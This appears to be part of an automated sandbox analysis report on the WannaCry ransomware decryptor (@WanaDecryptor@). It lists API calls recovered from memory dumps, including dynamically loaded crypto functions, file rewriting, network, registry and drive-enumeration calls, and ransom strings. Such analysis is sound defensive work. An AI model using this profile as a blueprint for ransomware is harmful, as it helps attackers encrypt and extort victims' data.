    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 00404B70: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
      • Part of subcall function 00404B70: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
    • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
    • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
    • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
    • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
    • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
    • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
    • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #537.MFC42(Received response), ref: 00401634
    • #2385.MFC42 ref: 00401653
    • #537.MFC42(Succeed), ref: 0040166F
    • #2385.MFC42(?,?,?,Succeed), ref: 00401684
    • #537.MFC42(Sent request), ref: 0040169F
    • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
    • #2385.MFC42 ref: 004016D3
    • #537.MFC42(Connected), ref: 004016F5
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
    • #2385.MFC42 ref: 00401729
    • #2385.MFC42(?,?,?), ref: 0040174C
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00404B86
    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00402C46), ref: 00404BA3
    • GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,00402C46), ref: 00404BB0
    • GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,00402C46), ref: 00404BBD
    • GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,00402C46), ref: 00404BCA
    • GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,00402C46), ref: 00404BD7
    • GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,00402C46), ref: 00404BE4
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #9.WS2_32 ref: 0040D6C7
    • #23.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
    • #2.WS2_32(00000000,?,00000010), ref: 0040D709
    • #10.WS2_32(00000000,8004667E,?), ref: 0040D728
    • #4.WS2_32(00000000,?,00000010), ref: 0040D73A
    • #18.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
    • #151.WS2_32(00000000,?), ref: 0040D791
    • #151.WS2_32(00000000,?,00000000,?), ref: 0040D7A3
    • #10.WS2_32(00000000,8004667E,?,00000000,?), ref: 0040D7BB
    • #21.WS2_32(00000000), ref: 0040D7DD
    • #21.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
    • #3.WS2_32(00000000), ref: 0040D80E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #4710.MFC42 ref: 00404DD5
    • CreateSolidBrush.GDI32(?), ref: 00404DE9
    • #1641.MFC42(00000000), ref: 00404DF3
    • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
    • #1641.MFC42(00000000), ref: 00404E26
    • #3092.MFC42(00000403,00000000), ref: 00404E32
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
    • #3092.MFC42(00000001), ref: 00404E57
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
    • #3092.MFC42(00000002), ref: 00404E76
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 00410A50: SetFilePointer.KERNEL32(?,?,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A79
      • Part of subcall function 00410A50: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00410CA4,?,00000000,00000002,00000000,?,00000000,FFFFFFFF,?), ref: 00410A9B
    • #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00410AF0: ReadFile.KERNEL32(000000FF,00000404,ZA,00000404,00000000), ref: 00410B18
    • #825.MFC42(00000000), ref: 00411E84
    • _mbsstr.MSVCRT ref: 00411F04
    • _mbsstr.MSVCRT ref: 00411F1B
    • _mbsstr.MSVCRT ref: 00411F32
    • _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411B80: SystemTimeToFileTime.KERNEL32(?,?), ref: 00411BE6
    • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
    • #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004022AB
    • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 004022E5
    • SetEndOfFile.KERNEL32(00000000), ref: 004022E8
      • Part of subcall function 00404AF0: EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
      • Part of subcall function 00404AF0: LeaveCriticalSection.KERNEL32(00000014), ref: 00404B3B
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
      • Part of subcall function 0040A150: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
      • Part of subcall function 0040A150: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B3C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
      • Part of subcall function 0040B3C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    • _local_unwind2.MSVCRT ref: 00402452
    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
    • SetEndOfFile.KERNEL32(00000000), ref: 00402491
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
    • _local_unwind2.MSVCRT ref: 00402511
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
    • #823.MFC42(00000001,?,?), ref: 00406DEC
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
    • _strnicmp.MSVCRT ref: 00406E3E
    • _strnicmp.MSVCRT ref: 00406E5A
    • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
    • #6136.MFC42 ref: 00406EC4
    • #825.MFC42(?), ref: 00406ED7
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116C8
      • Part of subcall function 00411660: malloc.MSVCRT ref: 004116E7
      • Part of subcall function 00411660: free.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 00411707
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B03
      • Part of subcall function 00411AC0: free.MSVCRT(?,?,?,?,00411D27,?,?,?,00000000), ref: 00411B32
      • Part of subcall function 00411CF0: #823.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411E5B
      • Part of subcall function 00411CF0: #825.MFC42(00000000), ref: 00411E84
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F04
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F1B
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F32
      • Part of subcall function 00411CF0: _mbsstr.MSVCRT ref: 00411F49
      • Part of subcall function 00411CF0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00412078
      • Part of subcall function 00411CF0: #825.MFC42(?,?,?,?,?,?,?,?,?,?,?), ref: 004121FB
    • wsprintfA.USER32 ref: 004125F9
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 0041262A
    • wsprintfA.USER32 ref: 00412684
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(00000000), ref: 00412338
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
    • #823.MFC42(00004000), ref: 004126BF
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00412714
    • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041275F
    • CloseHandle.KERNEL32(00000000), ref: 00412770
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • __set_app_type.MSVCRT ref: 0041312F
    • __p__fmode.MSVCRT ref: 00413144
    • __p__commode.MSVCRT ref: 00413152
    • __setusermatherr.MSVCRT ref: 0041317E
      • Part of subcall function 004133B2: _controlfp.MSVCRT ref: 004133BC
    • _initterm.MSVCRT ref: 00413194
    • __getmainargs.MSVCRT ref: 004131B7
    • _initterm.MSVCRT ref: 004131C7
    • GetStartupInfoA.KERNEL32(?), ref: 00413206
    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0041322A
      • Part of subcall function 004133E6: #1576.MFC42(?,?,?,62A,00413236,00000000,?,0000000A), ref: 004133F6
    • exit.MSVCRT ref: 0041323A
    • _XcptFilter.MSVCRT ref: 0041324C
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • wcscat.MSVCRT ref: 00401CC1
    • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
    • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
    • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
    • RegQueryValueExA.ADVAPI32 ref: 00401D81
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
    • RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
    • GetParent.USER32(?), ref: 004042BB
    • #2864.MFC42(00000000), ref: 004042C2
    • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
    • #2379.MFC42 ref: 004042DD
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
    • #2379.MFC42(?), ref: 004042FF
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
    • strtok.MSVCRT ref: 0040BBA9
      • Part of subcall function 0040C7B0: #825.MFC42(?,00000000,0040BBD1,00000000,00000000,00000000), ref: 0040C7D7
      • Part of subcall function 0040C920: ?_Xlen@std@@YAXXZ.MSVCP60(00000001,?,0040BBE8,00000000,?,00000000,00000000,00000000), ref: 0040C92D
      • Part of subcall function 0040C800: #823.MFC42(00000018,00000000,00000000,00000001,?,0040BC08), ref: 0040C80F
    • strtok.MSVCRT ref: 0040BC22
    • #825.MFC42(?,?), ref: 0040BCDD
    • GetTickCount.KERNEL32(?,00000000,00000000), ref: 0040BCEC
    • srand.MSVCRT ref: 0040BCF3
    • rand.MSVCRT ref: 0040BD09
      • Part of subcall function 0040CE50: #825.MFC42(?,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE6F
      • Part of subcall function 0040CE50: #825.MFC42(00000008,?,0040BD9E,00000000,?,?,?,00000000,00000000), ref: 0040CE95
    • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8A3
      • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
    • #825.MFC42(?,?,?,?), ref: 0040BDED
    • #825.MFC42(?), ref: 0040BE7A
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C776
      • Part of subcall function 0040C740: #825.MFC42(?,00422214,?,00000000,0040BE6F,?,?,?,00000000), ref: 0040C794
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
      • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
      • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
      • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
      • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
      • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
    • sprintf.MSVCRT ref: 0040397A
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
      • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
      • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
      • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
    • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
      • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00403AF0: fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00403AF0: fclose.MSVCRT ref: 00403C62
    • CloseHandle.KERNEL32(?), ref: 004039F1
    Strings
    • %08X.dky, xrefs: 00403969
    • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
    • All your files have been decrypted!, xrefs: 004039C3
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • wcscpy.MSVCRT ref: 0040257D
    • wcsrchr.MSVCRT ref: 0040258A
    • _wcsicmp.MSVCRT ref: 004025A5
    • _wcsicmp.MSVCRT ref: 004025B4
    • wcscat.MSVCRT ref: 004025D3
      • Part of subcall function 004020A0: GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
      • Part of subcall function 004020A0: SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402452
      • Part of subcall function 004020A0: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040248A
      • Part of subcall function 004020A0: SetEndOfFile.KERNEL32(00000000), ref: 00402491
      • Part of subcall function 004020A0: SetFileTime.KERNEL32(00000000,?,?,?), ref: 004024AD
      • Part of subcall function 004020A0: _local_unwind2.MSVCRT ref: 00402511
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
    • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
    • #860.MFC42(00421798), ref: 004040F6
    • #858.MFC42(00000000,00421798), ref: 004040FE
    • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
    • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
      • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    • #2514.MFC42 ref: 00407CE5
    • #2414.MFC42 ref: 00407D1A
    • #2414.MFC42 ref: 00407D4F
    • #616.MFC42 ref: 00407D6E
    • #693.MFC42 ref: 00407D7F
    • #641.MFC42 ref: 00407D93
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
      • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
      • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
    • fopen.MSVCRT ref: 0040C46B
    • fwrite.MSVCRT ref: 0040C489
    • fclose.MSVCRT ref: 0040C48F
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
    APIs
